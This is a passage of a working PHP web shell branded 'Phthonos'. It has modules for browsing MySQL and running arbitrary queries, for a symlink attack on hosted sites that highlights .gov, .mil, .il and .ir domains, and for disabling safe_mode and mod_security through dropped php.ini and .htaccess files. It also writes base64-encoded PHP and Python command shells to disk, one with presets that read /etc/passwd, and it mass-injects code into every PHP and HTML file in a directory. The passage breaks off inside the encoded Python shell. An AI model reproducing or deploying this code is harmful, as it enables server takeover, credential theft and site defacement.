"<th>$column</th>"; $kolum = $column; } $msg .= "</tr>"; $hasil = @mysql_query("SELECT count(*) FROM ".$db.".".$table); list($total) = mysql_fetch_row($hasil); if(isset($_GET['z'])) $page = (int) $_GET['z']; else $page = 1; $pagenum = 100; $totpage = ceil($total / $pagenum); $start = (($page - 1) * $pagenum); $hasil = @mysql_query("SELECT * FROM ".$db.".".$table." LIMIT ".$start.",".$pagenum); while($datas = @mysql_fetch_assoc($hasil)){ $msg .= "<tr>"; foreach($datas as $data){ if(trim($data) == "") $data = "&nbsp;"; $msg .= "<td>$data</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; $head = "<div style=\"padding:10px 0 0 6px;\"> <form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <input type=\"hidden\" name=\"table\" value=\"".$table."\" /> Page <select class=\"inputz\" name=\"z\" onchange=\"this.form.submit();\">"; for($i = 1;$i <= $totpage;$i++){ $head .= "<option value=\"".$i."\">".$i."</option>"; if($i == $_GET['z']) $head .= "<option value=\"".$i."\" selected=\"selected\">".$i."</option>"; } $head .= "</select><noscript><input class=\"inputzbut\" type=\"submit\" value=\"Go !\" /></noscript></form></div>"; $msg = $msgq.$head.$msg; } elseif(isset($_GET['submitquery']) && ($_GET['sqlquery'] != "")){ $db = $_GET['db']; $query = magicboom($_GET['sqlquery']); $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; @mysql_select_db($db); $querys = explode(";",$query); foreach($querys as $query){ if(trim($query) != ""){ $hasil = mysql_query($query); if($hasil){ $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> ok <span class=\"gaya\">]</span></p>"; $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr>"; for($i=0;$i<@mysql_num_fields($hasil);$i++) $msg .= "<th>".htmlspecialchars(@mysql_field_name($hasil,$i))."</th>"; $msg .= "</tr>"; for($i=0;$i<@mysql_num_rows($hasil);$i++) { $rows=@mysql_fetch_array($hasil); $msg .= "<tr>"; for($j=0;$j<@mysql_num_fields($hasil);$j++) { if($rows[$j] == "") $dataz = "&nbsp;"; else $dataz = $rows[$j]; $msg .= "<td>".$dataz."</td>"; } $msg .= "</tr>"; } $msg .= "</table>"; } else $msg .= "<p style=\"padding:0;margin:20px 6px 0 6px;\">".$query.";&nbsp;&nbsp;&nbsp;<span class=\"gaya\">[</span> error <span class=\"gaya\">]</span></p>"; } } } else { $query = "SHOW PROCESSLIST;\nSHOW VARIABLES;\nSHOW STATUS;"; $msg = "<div style=\"width:99%;padding:0 10px;\"><form action=\"?\" method=\"get\"> <input type=\"hidden\" name=\"y\" value=\"".$pwd."\" /> <input type=\"hidden\" name=\"x\" value=\"mysql\" /> <input type=\"hidden\" name=\"sqlhost\" value=\"".$sqlhost."\" /> <input type=\"hidden\" name=\"sqluser\" value=\"".$sqluser."\" /> <input type=\"hidden\" name=\"sqlport\" value=\"".$sqlport."\" /> <input type=\"hidden\" name=\"sqlpass\" value=\"".$sqlpass."\" /> <input type=\"hidden\" name=\"db\" value=\"".$db."\" /> <p><textarea name=\"sqlquery\" class=\"output\" style=\"width:98%;height:80px;\">".$query."</textarea></p> <p><input class=\"inputzbut\" style=\"width:80px;\" name=\"submitquery\" type=\"submit\" value=\"Go !\" /></p> </form></div> "; $dbs = array(); $msg .= "<table class=\"explore\" style=\"width:99%;\"><tr><th>available databases</th></tr>"; $hasil = @mysql_list_dbs($con); while(list($db) = @mysql_fetch_row($hasil)){ @array_push($dbs,$db); } @sort($dbs); foreach($dbs as $db){ $msg .= "<tr><td><a href=\"?y=".$pwd."&amp;x=mysql&amp;sqlhost=".$sqlhost."&amp;sqluser=".$sqluser."&amp;sqlpass=".$sqlpass."&amp;sqlport=".$sqlport."&amp;db=".$db."\">$db</a></td></tr>"; } $msg .= "</table>"; } @mysql_close($con); } else $msg = "<p style=\"text-align:center;\">cant connect to mysql server</p>"; echo $msg; } else{ ?> <form action="?" method="get"> <input type="hidden" name="y" value="<?php echo $pwd; ?>" /> <input type="hidden" name="x" value="mysql" /> <table class="tabnet" style="width:300px;"> <tr><th colspan="2">Connect to mySQL server</th></tr> <tr><td>&nbsp;&nbsp;Host</td><td><input style="width:220px;" class="inputz" type="text" name="sqlhost" value="localhost" /></td></tr> <tr><td>&nbsp;&nbsp;Username</td><td><input style="width:220px;" class="inputz" type="text" name="sqluser" value="root" /></td></tr> <tr><td>&nbsp;&nbsp;Password</td><td><input style="width:220px;" class="inputz" type="text" name="sqlpass" value="password" /></td></tr> <tr><td>&nbsp;&nbsp;Port</td><td><input style="width:80px;" class="inputz" type="text" name="sqlport" value="3306" />&nbsp;<input style="width:19%;" class="inputzbut" type="submit" value="Go !" name="submitsql" /></td></tr> </table> </form> <?php }}
  146.    elseif(isset($_GET['x']) && ($_GET['x'] == 'phpinfo')){ @ob_start(); @eval("phpinfo();"); $buff = @ob_get_contents(); @ob_end_clean(); $awal = strpos($buff,"<body>")+6; $akhir = strpos($buff,"</body>"); echo "<div class=\"phpinfo\">".substr($buff,$awal,$akhir-$awal)."</div>"; }
  147.  
  148.   elseif(isset($_GET['x']) && ($_GET['x'] == 'logout')){ @session_start(); @session_unregister("login"); echo "<meta http-equiv='refresh' content='0; url=?y=".$pwd."' />"; "</div>"; }
  149.  elseif(isset($_GET['x']) && ($_GET['x'] == 'symlink'))
  150. {      
  151. ?>
  152. <form action="?y=<?php echo $pwd; ?>&amp;x=symlink" method="post">
  153.  
  154. <?php  
  155.  
  156. @set_time_limit(0);
  157.  
  158. echo "<center>";
  159.  
  160. @mkdir('sym',0777);
  161. $htaccess  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
  162. $write =@fopen ('sym/.htaccess','w');
  163. fwrite($write ,$htaccess);
  164. @symlink('/','sym/root');
  165. $filelocation = basename(__FILE__);
  166. $read_named_conf = @file('/etc/named.conf');
  167. if(!$read_named_conf)
  168. {
  169. echo "<pre class=ml1 style='margin-top:5px'># Cant access this file on server -> [ /etc/named.conf ]</pre></center>";
  170. }
  171. else
  172. {
  173. echo "<br><br><div class='tmp'><table border='1' bordercolor='#FF0000' width='400' cellpadding='1' cellspacing='0'><td>Domains</td><td>Users</td><td>symlink </td>";
  174. foreach($read_named_conf as $subject){
  175. if(eregi('zone',$subject)){
  176. preg_match_all('#zone "(.*)"#',$subject,$string);
  177. flush();
  178. if(strlen(trim($string[1][0])) >2){
  179. $UID = posix_getpwuid(@fileowner('/etc/valiases/'.$string[1][0]));
  180. $name = $UID['name'] ;
  181. @symlink('/','sym/root');
  182. $name   = $string[1][0];
  183. $iran   = '\.ir';
  184. $israel = '\.il';
  185. $indo   = '\.id';
  186. $sg12   = '\.sg';
  187. $edu    = '\.edu';
  188. $gov    = '\.gov';
  189. $gose   = '\.go';
  190. $gober  = '\.gob';
  191. $mil1   = '\.mil';
  192. $mil2   = '\.mi';
  193. $my     = '\.my';
  194. if (eregi("$iran",$string[1][0]) or eregi("$israel",$string[1][0]) or eregi("$indo",$string[1][0])or eregi("$sg12",$string[1][0]) or eregi ("$edu",$string[1][0]) or eregi ("$gov",$string[1][0]) or eregi("$my",$string[1][0])
  195. or eregi ("$gose",$string[1][0]) or eregi("$gober",$string[1][0]) or eregi("$mil1",$string[1][0]) or eregi ("$mil2",$string[1][0]))
  196. {
  197. $name = "<div style=' color: #FF0000 ; text-shadow: 0px 0px 1px red; '>".$string[1][0].'</div>';
  198. }
  199. echo "
  200. <tr>
  201.  
  202. <td>
  203. <div class='dom'><a target='_blank' href=http://www.".$string[1][0].'/>'.$name.' </a> </div>
  204. </td>
  205.  
  206. <td>
  207. '.$UID['name']."
  208. </td>
  209.  
  210. <td>
  211. <a href='sym/root/home/".$UID['name']."/public_html' target='_blank'>Symlink </a>
  212. </td>
  213.  
  214. </tr></div> ";
  215. flush();
  216. }
  217. }
  218. }
  219. }
  220.  
  221. echo "</center></table>";  
  222.  
  223.  
  224. "</div>"; }
  225.  
  226.  
  227.    elseif(isset($_GET['x']) && ($_GET['x'] == 'bypass')) { echo "<center/><br/><b><font color=blue>Phthonos  Private Safe Mode Command  Bypass Exploit</font></b><br>
  228. ";
  229.   mkdir('safeof', 0755);
  230.         chdir('safeof');
  231. $kokdosya = ".htaccess";
  232.  
  233. $dosya_adi = "$kokdosya";
  234. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a??lamad?!");
  235. $metin = "<IfModule mod_security.c>
  236.     SecFilterEngine Off
  237.     SecFilterScanPOST Off
  238. </IfModule>";  
  239. fwrite ( $dosya , $metin ) ;
  240. fclose ($dosya);
  241.  
  242. $kokdosya = "php.ini";
  243.  
  244. $dosya_adi = "$kokdosya";
  245. $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a??lamad?!");
  246. $metin = "safe_mode          =       OFF
  247. disable_functions       =            NONE";    
  248. fwrite ( $dosya , $metin ) ;
  249. fclose ($dosya);
  250. $mini = 'PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCmJvZHl7IGJhY2tncm91bmQ6IzAwMDAwMDsgfSBhIHsgdGV4dC1kZWNvcmF0aW9uOm5vbmU7IH0gYTpob3ZlcnsNCglib3JkZXItYm90dG9tLXdpZHRoOiAxcHg7DQoJYm9yZGVyLWJvdHRvbS1zdHlsZTogc29saWQ7DQoJYm9yZGVyLWJvdHRvbS1jb2xvcjogIzk5MDAwMDsNCn0gKnsgZm9udC1zaXplOjExcHg7IGZvbnQtZmFtaWx5OlRhaG9tYSxWZXJkYW5hLEFyaWFsOyBjb2xvcjojRkZGRkZGOyB9ICNtZW51ew0KCW1hcmdpbi10b3A6IDhweDsNCgltYXJnaW4tcmlnaHQ6IDZweDsNCgltYXJnaW4tYm90dG9tOiAycHg7DQoJbWFyZ2luLWxlZnQ6IDJweDsNCgliYWNrZ3JvdW5kLWNvbG9yOiAjOTkwMDAwOw0KCWhlaWdodDogMjRweDsNCn0gI21lbnUgYXsNCgltYXJnaW46MDsNCgliYWNrZ3JvdW5kOiMyMjIyMjI7DQoJdGV4dC1kZWNvcmF0aW9uOm5vbmU7DQoJbGV0dGVyLXNwYWNpbmc6MnB4Ow0KCWZvbnQtZmFtaWx5OiB0YWhvbWEsIHZlcmRhbmEsIEFyaWFsOw0KCWNvbG9yOiAjQ0MwMDAwOw0KCXBhZGRpbmctdG9wOiA0cHg7DQoJcGFkZGluZy1yaWdodDogMTJweDsNCglwYWRkaW5nLWJvdHRvbTogNnB4Ow0KCXBhZGRpbmctbGVmdDogMThweDsNCn0gI21lbnUgYTpob3ZlcnsgYmFja2dyb3VuZDojMTkxOTE5OyBib3JkZXItYm90dG9tOjFweCBzb2xpZCAjMzMzMzMzOyBib3JkZXItdG9wOjFweCBzb2xpZCAjMzMzMzMzOyB9IC50YWJuZXR7DQoJbWFyZ2luOjE1cHggYXV0byAwIGF1dG87DQoJYm9yZGVyOiAxcHggc29saWQgIzMzMzMzMzsNCgljb2xvcjogI0ZGQ0MwMDsNCn0gLm1haW4gew0KCXdpZHRoOjk3JTsNCgltYXJnaW46MzBweCBhdXRvIDEwcHg7DQoJcGFkZGluZzoxMHB4IDEwcHggNXB4IDEwcHg7DQoJYm9yZGVyLXJhZGl1czo1cHg7DQotbW96LWJvcmRlci1yYWRpdXM6NXB4OyAtbW96LWJveC1zaGFkb3c6MHB4IDBweCAxMHB4ICM5OTAwMDA7IC13ZWJraXQtYm94LXNoYWRvdzowcHggMHB4IDVweCAjOTkwMDAwOwliYWNrZ3JvdW5kLWNvbG9yOiAjMDAwMDAwOw0KfSANCi5kb21haW4gew0KCWNvbG9yOiAjQ0MwMDAwOw0KCWJvcmRlcjogMXB4IHNvbGlkICM5OTAwMDA7DQp9DQouZ2F5YSB7IGNvbG9yOiAjQ0MwMDAwOyB9DQouZGYgew0KCWNvbG9yOiAjQ0MwMDAwOw0KCWZvbnQtZmFtaWx5OiB0YWhvbWEsIHZlcmRhbmEsIEFyaWFsOw0KfSANCi5pbnB1dHp7IGJhY2tncm91bmQ6IzExMTExMTsgYm9yZGVyOjA7IHBhZGRpbmc6MnB4OyBib3JkZXItYm90dG9tOjFweCBzb2xpZCAjMjIyMjIyOyBib3JkZXItdG9wOjFweCBzb2xpZCAjMjIyMjIyOyB9IC5pbnB1dHpidXR7IGJhY2tncm91bmQ6IzExMTExMTsgY29sb3I6I0NDMDAwMDsgbWFyZ2luOjAgNHB4OyBib3JkZXI6MXB4IHNvbGlkICM0NDQ0NDQ7IGN1cnNvcjpwb2ludGVyO30gLmlucHV0ejpob3ZlciwgLmlucHV0emJ1dDpob3ZlcnsgYm9yZGVyLWJvdHRvbToxcHggc29saWQgI0NDMDAwMDsgYm9yZGVyLXRvcDoxcHggc29saWQgI0NDMDAwMDsgfSAub3V0cHV0IHsgbWFyZ2luOmF1dG87IGJvcmRlcjoxcHggc29saWQgI0NDMDAwMDsgd2lkdGg6MTAwJTsgaGVpZ2h0OjQwMHB4OyBiYWNrZ3JvdW5kOiMwMDAwMDA7IHBhZGRpbmc6MCAycHg7IH0gLmNtZGJveHsgd2lkdGg6MTAwJTsgfSAuaGVhZF9pbmZveyBwYWRkaW5nOiAwIDRweDsgfSAuYjF7IGZvbnQtc2l6ZTozMHB4OyBwYWRkaW5nOjA7IGNvbG9yOiM0NDQ0NDQ7IH0gLmIyeyBmb250LXNpemU6MzBweDsgcGFkZGluZzowOyBjb2xvcjogIzMzMzMzMzsgfSAuYl90Ymx7IHRleHQtYWxpZ246Y2VudGVyOyBtYXJnaW46MCA0cHggMCAwOyBwYWRkaW5nOjAgNHB4IDAgMDsgYm9yZGVyLXJpZ2h0OjFweCBzb2xpZCAjMzMzMzMzOyB9IA0KPC9zdHlsZT4gDQo8P3BocA0KZWNobyAiPGI+PGZvbnQgY29sb3I9Ymx1ZT5Db21tYW5kIFNoZWxsPC9mb250PjwvYj48YnI+IjsNCnByaW50X3IoJw0KPHByZT4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPg0KPGI+PGZvbnQgY29sb3I9Ymx1ZT48Yj48Zm9udCBjb2xvcj0iYmx1ZSI+Q29tbWFuZCAgOj0pIDwvZm9udD48L2ZvbnQ+PC9iPjxpbnB1dCBuYW1lPSJiYWJhIiB0eXBlPSJ0ZXh0IiBjbGFzcz0iaW5wdXR6IiBzaXplPSIzNCI+PGlucHV0IHR5cGU9InN1Ym1pdCIgY2xhc3M9ImlucHV0emJ1dCIgdmFsdWU9IkdvIj4NCjwvZm9ybT4NCjxmb3JtIG1ldGhvZD0iUE9TVCIgYWN0aW9uPSIiPjxzdHJvbmc+PGI+PGZvbnQgY29sb3I9ImJsdWUiPk1lbnUgQnlwYXNzICA6PSkgIDwvZm9udD48L3N0cm9uZz48c2VsZWN0IG5hbWU9ImxpejAiIHNpemU9IjEiIGNsYXNzPSJpbnB1dHoiPg0KPG9wdGlvbiB2YWx1ZT0iY2F0IC9ldGMvcGFzc3dkIj4vZXRjL3Bhc3N3ZDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0ibmV0c3RhdCAtYW4gfCBncmVwIC1pIGxpc3RlbiI+bmV0c3RhdDwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iY2F0IC92YXIvY3BhbmVsL2FjY291bnRpbmcubG9nIj4vdmFyL2NwYW5lbC9hY2NvdW50aW5nLmxvZzwvb3B0aW9uPg0KPG9wdGlvbiB2YWx1ZT0iY2F0IC9ldGMvc3lzbG9nLmNvbmYiPi9ldGMvc3lzbG9nLmNvbmY8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9ImNhdCAvZXRjL2hvc3RzIj4vZXRjL2hvc3RzPC9vcHRpb24+DQo8b3B0aW9uIHZhbHVlPSJjYXQgL2V0Yy9uYW1lZC5jb25mIj4vZXRjL25hbWVkLmNvbmY8L29wdGlvbj4NCjxvcHRpb24gdmFsdWU9ImNhdCAvZXRjL2h0dHBkL2NvbmYvaHR0cGQuY29uZiI+L2V0Yy9odHRwZC9jb25mL2h0dHBkLmNvbmY8L29wdGlvbj4NCjwvc2VsZWN0PiA8aW5wdXQgdHlwZT0ic3VibWl0IiBjbGFzcz0iaW5wdXR6YnV0IiB2YWx1ZT0iRyZvdW1sOyI+DQo8L2Zvcm0+DQo8L3ByZT4NCicpOw0KaW5pX3Jlc3RvcmUoInNhZmVfbW9kZSIpOw0KaW5pX3Jlc3RvcmUoIm9wZW5fYmFzZWRpciIpOw0KJGxpejA9c2hlbGxfZXhlYygkX1BPU1RbYmFiYV0pOyANCiRsaXowemltPXNoZWxsX2V4ZWMoJF9QT1NUW2xpejBdKTsgDQokdWlkPXNoZWxsX2V4ZWMoJ2lkJyk7DQokc2VydmVyPXNoZWxsX2V4ZWMoJ3VuYW1lIC1hJyk7DQplY2hvICI8cHJlPjxoND4iOw0KDQplY2hvICRsaXowOw0KZWNobyAkbGl6MHppbTsNCmVjaG8gIjwvaDQ+PC9wcmU+PGNlbnRlci8+IjsNCj8+
  251. ';
  252.  
  253. $file = fopen("safe.php" ,"w+");
  254. $write = fwrite ($file ,base64_decode($mini));
  255. fclose($file);
  256.    echo "<iframe src=safeof/safe.php width=97% height=70% frameborder=0></iframe>
  257.  
  258.  
  259. </div>"; }
  260.  
  261.  
  262.  elseif(isset($_GET['x']) && ($_GET['x'] == 'massbrowsersploit')) { echo "<center/><br/><b>
  263.  +--==[ Mass Code Injection ]==--+
  264.  </b><br>";
  265. ?>
  266. <br>
  267. Directory to Inject.<br><br>
  268. <form action="<?php echo $surl; ?>" method=GET>
  269. <input type=hidden name="masssploit" value="goahead">
  270. <input type=hidden name="x" value="massbrowsersploit">
  271. <table border=0>
  272. <tr><td>Directory: </td><td><input class="inputz" type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"></td></tr>
  273. <tr><td>Code to inject: </td><td><textarea class="inputz" name="injectthis" cols=50 rows=4><?php echo htmlspecialchars('Phthonos <--- Here to destroy your system!'); ?></textarea></td></tr>
  274. <tr><td><input class="inputzbut" type=submit value="Inject Code"></td></tr>
  275. </table>
  276. </form>
  277. <?php
  278. if ($_GET['masssploit'] == 'goahead') {
  279.         if (is_dir($_GET['pathtomass'])) {
  280.                 $lolinject = $_GET['injectthis'];
  281.                 foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) {
  282.                         $fp=fopen($injectj00,"a+");
  283.                         if (fputs($fp,$lolinject)){
  284.                                 echo '<font color=green>'.$injectj00.' sukses di injek<br></font>';
  285.                         } else {
  286.                                 echo '<font color=red>gagal di injek '.$injectj00.'</font>';
  287.                         }
  288.                 }
  289.                 foreach (glob($_GET['pathtomass']."/*.htm") as $injectj00) {
  290.                         $fp=fopen($injectj00,"a+");
  291.                         if (fputs($fp,$lolinject)){
  292.                                 echo $injectj00.' sukses di injek<br>';
  293.                         } else {
  294.                                 echo '<font color=red>gagal di injek '.$injectj00.'</font>';
  295.                         }
  296.                 }
  297.                 foreach (glob($_GET['pathtomass']."/*.html") as $injectj00) {
  298.                         $fp=fopen($injectj00,"a+");
  299.                         if (fputs($fp,$lolinject)){
  300.                                 echo $injectj00.' sukses di injek<br>';
  301.                         } else {
  302.                                 echo '<font color=red>gagal di injek '.$injectj00.'</font>';
  303.                         }
  304.                 }
  305.         } else {
  306.                 echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b>';
  307.         }
  308. }
  309.  
  310.  
  311. ?>
  312. <b>Mass Code Injection:</b><br><br>
  313. .PHP File Injector<br><br>
  314. <form action="<?php echo $surl; ?>" method=GET>
  315. <input type=hidden name="masssploit" value="php">
  316. <input type=hidden name="x" value="massbrowsersploit">
  317. <table border=0>
  318. <tr><td>Directory: </td><td><input class="inputz" type=text size=50 name="pathtomass" value="<?php echo realpath('.'); ?>"></td></tr>
  319. <tr><td>Code to inject: </td><td><textarea name="injectthis" class="inputz" cols=50 rows=4><?php echo htmlspecialchars('Phthonos'); ?></textarea></td></tr>
  320. <tr><td><input class="inputzbut" type=submit value="Inject Code"></td></tr>
  321. </table>
  322. </form>
  323. <?php
  324. if ($_GET['masssploit'] == 'php') {
  325.         if (is_dir($_GET['pathtomass'])) {
  326.                 $lolinject = $_GET['injectthis'];
  327.                 foreach (glob($_GET['pathtomass']."/*.php") as $injectj00) {
  328.                         $fp=fopen($injectj00,"a+");
  329.                         if (fputs($fp,$lolinject)){
  330.                                 echo '<font color=green>'.$injectj00.' sukses di injek<br></font>';
  331.                         } else {
  332.                                 echo '<font color=red>gagal di injek '.$injectj00.'</font>';
  333.                         }
  334.                 }
  335.         } else {
  336.                 echo '<b><font color=red>'.$_GET['pathtomass'].' is not available!</font></b></div>';
  337.         }
  338. }
  339.  
  340.  
  341. }
  342.  
  343.  
  344.  
  345.  elseif(isset($_GET['x']) && ($_GET['x'] == 'safemode')) { echo "<center/><br/><b>
  346.  +--==[ safemode ]==--+
  347.  </b><br>";
  348.  echo "<right>";
  349. echo"<FORM method='POST' action='$REQUEST_URI' enctype='multipart/form-data'>
  350.         <p align='center'>
  351.         <INPUT class='inputzbut' type='submit' name='FucK' value='Bypass Mode!!' id=input  border-width: 1px'></p>
  352. </form>
  353. ";
  354. echo "<right/>";
  355. if  (empty($_POST['FucK'] ) ) {
  356.         }ELSE{
  357.         $action = '?action=FucK';
  358. echo "<html>
  359. <br>
  360. <head>
  361. <meta http-equiv='pragma' content='no-cache'>
  362. </head><body>";
  363.  
  364. $fp = fopen("php.ini","w+");
  365. fwrite($fp,"safe_mode = Off
  366. disable_functions  =    NONE
  367. open_basedir = OFF ");
  368. echo "<b>[ Bypass PHP.ini Injected..! ] ..</b>";
  369. echo ("<br>");
  370.  
  371. $fp2 = fopen(".htaccess","w+");
  372. fwrite($fp2,"
  373. <IfModule mod_security.c>
  374. FucKFilterEngine Off
  375. FucKFilterScanPOST Off
  376. FucKFilterCheckURLEncoding Off
  377. FucKFilterCheckUnicodeEncoding Off
  378. </IfModule>
  379. ");
  380.  
  381.  
  382. echo "<b>[ Bypass Mod_Security ok..! ]</b><br>";
  383.  
  384.     echo "</font></center></td></tr></table> ";
  385.  
  386.  
  387.  }
  388.  
  389.  
  390.   echo "</div>"; }
  391.  
  392.  
  393.  elseif(isset($_GET['x']) && ($_GET['x'] == 'python')) { echo "<center/><br/><b>
  394.  +--==[ python  Bypass Exploit ]==--+
  395.  </b><br><br>";
  396.  
  397.  
  398.     mkdir('python', 0755);
  399.     chdir('python');
  400.         $kokdosya = ".htaccess";
  401.         $dosya_adi = "$kokdosya";
  402.         $dosya = fopen ($dosya_adi , 'w') or die ("Dosya a&#231;&#305;lamad&#305;!");
  403.         $metin = "AddHandler cgi-script .izo";    
  404.         fwrite ( $dosya , $metin ) ;
  405.         fclose ($dosya);
  406. $pythonp = 'IyEvdXNyL2Jpbi9weXRob24NCiMgMDctMDctMDQNCiMgdjEuMC4wDQoNCiMgY2dpLXNoZWxsLnB5DQojIEEgc2ltcGxlIENHSSB0aGF0IGV4ZWN1dGVzIGFyYml0cmFyeSBzaGVsbCBjb21tYW5kcy4NCg0KDQojIENvcHlyaWdodCBNaWNoYWVsIEZvb3JkDQojIFlvdSBhcmUgZnJlZSB0byBtb2RpZnksIHVzZSBhbmQgcmVsaWNlbnNlIHRoaXMgY29kZS4NCg0KIyBObyB3YXJyYW50eSBleHByZXNzIG9yIGltcGxpZWQgZm9yIHRoZSBhY2N1cmFjeSwgZml0bmVzcyB0byBwdXJwb3NlIG9yIG90aGVyd2lzZSBmb3IgdGhpcyBjb2RlLi4uLg0KIyBVc2UgYXQgeW91ciBvd24gcmlzayAhISENCg0KIyBFLW1haWwgbWljaGFlbCBBVCBmb29yZCBET1QgbWUgRE9UIHVrDQojIE1haW50YWluZWQgYXQgd3d3LnZvaWRzcGFjZS5vcmcudWsvYXRsYW50aWJvdHMvcHl0aG9udXRpbHMuaHRtbA0KDQoiIiINCkEgc2ltcGxlIENHSSBzY3JpcHQgdG8gZXhlY3V0ZSBzaGVsbCBjb21tYW5kcyB2aWEgQ0dJLg0KIiIiDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojIEltcG9ydHMNCnRyeToNCiAgICBpbXBvcnQgY2dpdGI7IGNnaXRiLmVuYWJsZSgpDQpleGNlcHQ6DQogICAgcGFzcw0KaW1wb3J0IHN5cywgY2dpLCBvcw0Kc3lzLnN0ZGVyciA9IHN5cy5zdGRvdXQNCmZyb20gdGltZSBpbXBvcnQgc3RyZnRpbWUNCmltcG9ydCB0cmFjZWJhY2sNCmZyb20gU3RyaW5nSU8gaW1wb3J0IFN0cmluZ0lPDQpmcm9tIHRyYWNlYmFjayBpbXBvcnQgcHJpbnRfZXhjDQoNCiMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMNCiMgY29uc3RhbnRzDQoNCmZvbnRsaW5lID0gJzxGT05UIENPTE9SPSM0MjQyNDIgc3R5bGU9ImZvbnQtZmFtaWx5OnRpbWVzO2ZvbnQtc2l6ZToxMnB0OyI+Jw0KdmVyc2lvbnN0cmluZyA9ICdWZXJzaW9uIDEuMC4wIDd0aCBKdWx5IDIwMDQnDQoNCmlmIG9zLmVudmlyb24uaGFzX2tleSgiU0NSSVBUX05BTUUiKToNCiAgICBzY3JpcHRuYW1lID0gb3MuZW52aXJvblsiU0NSSVBUX05BTUUiXQ0KZWxzZToNCiAgICBzY3JpcHRuYW1lID0gIiINCg0KTUVUSE9EID0gJyJQT1NUIicNCg0KIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIw0KIyBQcml2YXRlIGZ1bmN0aW9ucyBhbmQgdmFyaWFibGVzDQoNCmRlZiBnZXRmb3JtKHZhbHVlbGlzdCwgdGhlZm9ybSwgbm90cHJlc2VudD0nJyk6DQogICAgIiIiVGhpcyBmdW5jdGlvbiwgZ2l2ZW4gYSBDR0kgZm9ybSwgZXh0cmFjdHMgdGhlIGRhdGEgZnJvbSBpdCwgYmFzZWQgb24NCiAgICB2YWx1ZWxpc3QgcGFzc2VkIGluLiBBbnkgbm9uLXByZXNlbnQgdmFsdWVzIGFyZSBzZXQgdG8gJycgLSBhbHRob3VnaCB0aGlzIGNhbiBiZSBjaGFuZ2VkLg0KICAgIChlLmcuIHRvIHJldHVybiBOb25lIHNvIHlvdSBjYW4gdGVzdCBmb3IgbWlzc2luZyBrZXl3b3JkcyAtIHdoZXJlICcnIGlzIGEgdmFsaWQgYW5zd2VyIGJ1dCB0byBoYXZlIHRoZSBmaWVsZCBtaXNzaW5nIGlzbid0LikiIiINCiAgICBkYXRhID0ge30NCiAgICBmb3IgZmllbGQgaW4gdmFsdWVsaXN0Og0KICAgICAgICBpZiBub3QgdGhlZm9ybS5oYXNfa2V5KGZpZWxkKToNCiAgICAgICAgICAgIGRhdGFbZmllbGRdID0gbm90cHJlc2VudA0KICAgICAgICBlbHNlOg0KICAgICAgICAgICAgaWYgIHR5cGUodGhlZm9ybVtmaWVsZF0pICE9IHR5cGUoW10pOg0KICAgICAgICAgICAgICAgIGRhdGFbZmllbGRdID0gdGhlZm9ybVtmaWVsZF0udmFsdWUNCiAgICAgICAgICAgIGVsc2U6DQogICAgICAgICAgICAgICAgdmFsdWVzID0gbWFwKGxhbWJkYSB4OiB4LnZhbHVlLCB0aGVmb3JtW2ZpZWxkXSkgICAgICMgYWxsb3dzIGZvciBsaXN0IHR5cGUgdmFsdWVzDQogICAgICAgICAgICAgICAgZGF0YVtmaWVsZF0gPSB2YWx1ZXMNCiAgICByZXR1cm4gZGF0YQ0KDQoNCnRoZWZvcm1oZWFkID0gIiIiPEhUTUw+PEhFQUQ+PFRJVExFPkNHSS1TaGVsbC5weTwvVElUTEU+PC9IRUFEPg0KPEJPRFk+PENFTlRFUj4NCjxIMT5XZWxjb21lIHRvIGNnaS1zaGVsbC5weSAtIDxCUj5hIFB5dGhvbiBDR0k8L0gxPg0KPEI+PEk+QnkgRnV6enltYW48L0I+PC9JPjxCUj4NCiIiIitmb250bGluZSArIlZlcnNpb24gOiAiICsgdmVyc2lvbnN0cmluZyArICIiIiwgUnVubmluZyBvbiA6ICIiIiArIHN0cmZ0aW1lKCclSTolTSAlcCwgJUEgJWQgJUI